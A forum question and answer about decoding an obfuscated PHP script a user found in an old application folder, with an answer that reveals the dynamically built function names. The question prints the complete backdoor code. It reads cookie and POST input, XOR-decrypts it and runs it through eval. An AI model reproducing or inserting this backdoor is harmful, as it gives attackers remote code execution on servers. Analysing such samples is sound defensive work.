# Decoding encrypted malicious script

Tags: php, decode

I found in my old application directory a script from 2017. It is clearly malicious, can anybody help decoding it? The important part is encoded in first string but I am not able to decode it using any online decoding tool. It probably creates an array of directories? And sets cookie for whatever reason. I am curious what was the purpose of it.

```
$zkvaoku='li94f*50\'rng-_2dmxcv8uo1k3Hpb#sae6yt';
$crsqpj=Array();
$crsqpj[]=$zkvaoku[26].$zkvaoku[5];
$crsqpj[]=$zkvaoku[29];
$crsqpj[]=$zkvaoku[7].$zkvaoku[2].$zkvaoku[4].$zkvaoku[14].$zkvaoku[25].$zkvaoku[33].$zkvaoku[2].$zkvaoku[7].$zkvaoku[12].$zkvaoku[15].$zkvaoku[23].$zkvaoku[33].$zkvaoku[33].$zkvaoku[12].$zkvaoku[3].$zkvaoku[4].$zkvaoku[3].$zkvaoku[20].$zkvaoku[12].$zkvaoku[31].$zkvaoku[20].$zkvaoku[2].$zkvaoku[18].$zkvaoku[12].$zkvaoku[6].$zkvaoku[18].$zkvaoku[3].$zkvaoku[7].$zkvaoku[32].$zkvaoku[7].$zkvaoku[20].$zkvaoku[7].$zkvaoku[20].$zkvaoku[33].$zkvaoku[7].$zkvaoku[28];
$crsqpj[]=$zkvaoku[18].$zkvaoku[22].$zkvaoku[21].$zkvaoku[10].$zkvaoku[35];
$crsqpj[]=$zkvaoku[30].$zkvaoku[35].$zkvaoku[9].$zkvaoku[13].$zkvaoku[9].$zkvaoku[32].$zkvaoku[27].$zkvaoku[32].$zkvaoku[31].$zkvaoku[35];
$crsqpj[]=$zkvaoku[32].$zkvaoku[17].$zkvaoku[27].$zkvaoku[0].$zkvaoku[22].$zkvaoku[15].$zkvaoku[32];
$crsqpj[]=$zkvaoku[30].$zkvaoku[21].$zkvaoku[28].$zkvaoku[30].$zkvaoku[35].$zkvaoku[9];
$crsqpj[]=$zkvaoku[31].$zkvaoku[9].$zkvaoku[9].$zkvaoku[31].$zkvaoku[34].$zkvaoku[13].$zkvaoku[16].$zkvaoku[32].$zkvaoku[9].$zkvaoku[11].$zkvaoku[32];
$crsqpj[]=$zkvaoku[30].$zkvaoku[35].$zkvaoku[9].$zkvaoku[0].$zkvaoku[32].$zkvaoku[10];
$crsqpj[]=$zkvaoku[27].$zkvaoku[31].$zkvaoku[18].$zkvaoku[24];
foreach($crsqpj[7]($_COOKIE,$_POST) as $qxmpsom=>$laqeud) {
  function vlriqj($crsqpj,$qxmpsom,$lrkqaso) {
    return $crsqpj[6]($crsqpj[4]($qxmpsom.$crsqpj[2],($lrkqaso/$crsqpj[8]($qxmpsom))+1),0,$lrkqaso);
  }
  function pajbr($crsqpj,$olzmly) {
    return @$crsqpj[9]($crsqpj[0],$olzmly);
  }
  function pzdratz($crsqpj,$olzmly) {
    $losvhfn=$crsqpj[3]($olzmly)%3;
    if(!$losvhfn) {
      eval($olzmly[1]($olzmly[2]));
      exit();
    }
  }
  $laqeud=pajbr($crsqpj,$laqeud);
  pzdratz($crsqpj,$crsqpj[5]($crsqpj[1],$laqeud^ vlriqj($crsqpj,$qxmpsom,$crsqpj[8]($laqeud))));
}
```

How to find what kind of encoder is user in this string?

```
$zkvaoku='li94f*50\'rng-_2dmxcv8uo1k3Hpb#sae6yt';
```

Answer (score 1, accepted):

The `$zkvaoku` string at the beginning of the script isn't encoded in any "traditional" encoding. If you look at the block of statements following it, up until the `foreach` loop, you'll see that it's used to dynamically construct an array of strings that are much more readable.

If you print the content of `$crsqpj` after this block, you'll see the following:

```
Array (
    [0] => H*
    [1] => #
    [2] => 09f23690-d166-4f48-a89c-5c40e080860b
    [3] => count
    [4] => str_repeat
    [5] => explode
    [6] => substr
    [7] => array_merge
    [8] => strlen
    [9] => pack
)
```

Now you can start seeing how these strings are used to dynamically call functions.